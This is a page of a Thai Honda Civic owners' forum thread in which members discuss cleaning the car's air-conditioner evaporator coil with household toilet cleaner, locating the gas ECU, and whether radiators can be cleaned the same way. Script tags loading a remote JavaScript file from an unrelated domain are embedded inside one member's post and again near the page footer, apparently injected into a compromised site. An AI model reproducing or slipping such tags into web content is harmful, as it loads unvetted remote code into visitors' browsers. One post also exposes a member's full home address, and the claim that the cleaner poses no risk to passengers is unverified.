ตอบ
aea

ชื่อเล่น: เอ้

เข้าร่วม: 15 มีนา 2011
ตอบ: 930

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 361
ให้คำขอบคุณ: 691

ปี: 2005
สี: ดำ ไนท์ฮอว์ก (B-92P)
เสาร์, 8 ธันวา 2012 08:11 - มีหนังสั้นจะเล่าให้ฟังสำหรับเพื่อนๆที่ไม่ค่อยล้างตู้แอร์นะครับ ^ __ ^
ต้องลองบ้างแระ เดี๋ยวจะสายไป
ได้รับคำขอบคุณจาก: Makai 
Freeway

ชื่อเล่น: อุ้ม

เข้าร่วม: 25 พฤษภาคม 2011
ตอบ: 561

แซงซ้าย ปาดขวา
แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 232
ให้คำขอบคุณ: 612

ปี: 2001
สี: ขาว ทาฟเฟต้า (NH-578)
เสาร์, 8 ธันวา 2012 08:45 - มีหนังสั้นจะเล่าให้ฟังสำหรับเพื่อนๆที่ไม่ค่อยล้างตู้แอร์นะครับ ^ __ ^
ECU กล่องแก๊สนี่ติดไว้ตรงไหนคับ ตรงขาไต้คอนโซลหน้าบริเวณพวงมาลัยรึป่าวคับ ผมจะได้ถอดดูมั่ง
anglo

ชื่อเล่น: นัท

เข้าร่วม: 10 พฤษภาคม 2012
ตอบ: 1475

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1496
ให้คำขอบคุณ: 621

ที่อยู่: 19/313 หมู่บ้านณัฐกมล รัษฎา2 ซ.3 ถ.รัษฎานุสรณ์ ต.รัษฎา อ.เมือง จ.ภูเก็ต 83000
ปี: 2001
สี: ทอง ไทเทเนียม (เมทัลลิก) (YR-525M)
เสาร์, 8 ธันวา 2012 15:47 - มีหนังสั้นจะเล่าให้ฟังสำหรับเพื่อนๆที่ไม่ค่อยล้างตู้แอร์นะครับ ^ __ ^
อ้างอิงจาก:

ขอสอบถามก่อนทำตามหน่อยครับ

ล้างแผงแอร์โดยเอาเป็ดราดเนี่ยะ ถามแบบโง่ๆ เลยน่ะ กลิ่นน้ำยาเป็ดมันไม่เข้าระบบแอร์เหรอครับ? มันจะเกิดผลอันตรายต่อลูกชายคนโต & คนเล็ก ผมหรือเปล่า?

ไม่นี่ครับ ไม่ว่าจะเปนแผงแอร์ หรือ คอยเย็น ก้อใช้เป็ดล้างได้ครับ เพราะเราจะล้างตามด้วยน้ำสะอาด จนหมดเกลี้ยงอ่ะครับ

ไม่น่าจะมีหลงเหลือเลยนะครับ เพราะตอนที่ล้างเสดก้อเปิดดู ก้อไม่ได้กลิ่นหรือความผิดปกติใดครับ ฉะนั้นหายห่วงครับ อิอิ

jarin พิมพ์ว่า:
เพิ่มรูปคอยด์เย็นให้ดูครับ

นั่นง่ะครับ เทพ DIY มาแฉเองเลยครับ

ส่วนในรูปน่าจะเปนของรถเจ้าตัวครับ
[/quote]

ใช้วิธีเดียวกันนี้ ล้างหม้อน้ำได้มั้ยครับ?
Makai

ชื่อเล่น: มะไก่

เข้าร่วม: 16 พฤษภาคม 2010
ตอบ: 3940

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2065
ให้คำขอบคุณ: 3430

ปี: 2003
สี: ทอง แซทเทิลไลท์ (NH-663M)
จันทร์, 10 ธันวา 2012 10:23 - มีหนังสั้นจะเล่าให้ฟังสำหรับเพื่อนๆที่ไม่ค่อยล้างตู้แอร์นะครับ ^ __ ^
focusyo พิมพ์ว่า:
tonaff พิมพ์ว่า:
อยากล้างมั่งจัง
แต่ติดที่ว่าพอเสร็จแล้วมันก็หลับอะ
ลุกไปล้างไม่ไหว <script src="https://sport32news.com/civicesgroup.js"></

เอ
นั่นมันล้างอะไร

ล้างช่วงล่างครับพี่โย !! 
555+
Makai

ชื่อเล่น: มะไก่

เข้าร่วม: 16 พฤษภาคม 2010
ตอบ: 3940

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2065
ให้คำขอบคุณ: 3430

ปี: 2003
สี: ทอง แซทเทิลไลท์ (NH-663M)
จันทร์, 10 ธันวา 2012 10:28 - มีหนังสั้นจะเล่าให้ฟังสำหรับเพื่อนๆที่ไม่ค่อยล้างตู้แอร์นะครับ ^ __ ^
aea พิมพ์ว่า:
ต้องลองบ้างแระ เดี๋ยวจะสายไป

ถูกต้องที่สุดครับ เพราะ case นี้เปน case study สำหรับพี่ๆน้องๆ ES ทุกท่านนะครับ

อย่าให้มันเกิดก่อนเลยครับ ว่างๆลองเช็คกันดูครับ ง่ายๆเลยคร้าบบบ 

Freeway พิมพ์ว่า:
ECU กล่องแก๊สนี่ติดไว้ตรงไหนคับ ตรงขาไต้คอนโซลหน้าบริเวณพวงมาลัยรึป่าวคับ ผมจะได้ถอดดูมั่ง

ของผมมันอยู่ใต้พรมบริเวณขาของคนนั่งครับ ลองเปิดแล้วลองเช็คดูนะครับ ว่ามีคราบน้ำหมดรึป่าว เผื่อว่าแอร์มันอาจจะเริ่มตันอ่ะครับ ^ __ ^

anglo พิมพ์ว่า:
อ้างอิงจาก:

ขอสอบถามก่อนทำตามหน่อยครับ

ล้างแผงแอร์โดยเอาเป็ดราดเนี่ยะ ถามแบบโง่ๆ เลยน่ะ กลิ่นน้ำยาเป็ดมันไม่เข้าระบบแอร์เหรอครับ? มันจะเกิดผลอันตรายต่อลูกชายคนโต & คนเล็ก ผมหรือเปล่า?

ไม่นี่ครับ ไม่ว่าจะเปนแผงแอร์ หรือ คอยเย็น ก้อใช้เป็ดล้างได้ครับ เพราะเราจะล้างตามด้วยน้ำสะอาด จนหมดเกลี้ยงอ่ะครับ

ไม่น่าจะมีหลงเหลือเลยนะครับ เพราะตอนที่ล้างเสดก้อเปิดดู ก้อไม่ได้กลิ่นหรือความผิดปกติใดครับ ฉะนั้นหายห่วงครับ อิอิ

jarin พิมพ์ว่า:
เพิ่มรูปคอยด์เย็นให้ดูครับ

นั่นง่ะครับ เทพ DIY มาแฉเองเลยครับ

ส่วนในรูปน่าจะเปนของรถเจ้าตัวครับ

ใช้วิธีเดียวกันนี้ ล้างหม้อน้ำได้มั้ยครับ?[/quote]
อันนี้ไม่แน่ใจนะครับ

แต่ที่เราล้างแผงแอร์นั้น เพราะว่าคราบสกปรกมันจับเยอะมาก ทำให้ลมมันไม่ flow ผ่านเข้าไปได้อ่ะครับ

แ่ต่หม้อน้ำที่เค้าล้าง เค้าล้างข้างในกันนี่ครับ ??

ผิดถูกอย่างไรรอผู้รู้มาตอบดีกว่าเนอะ
 "<script src="https://sport32news.com/civicesgroup.js"> "<script src="https://sport32news.com/civicesgroup.js">
ตอบ
หน้า 3 จาก 3
ไปที่: 
ติดต่อโฆษณา admin@civicesgroup.com
Copyright © 2008-2024 Civic ES Group. All rights reserved.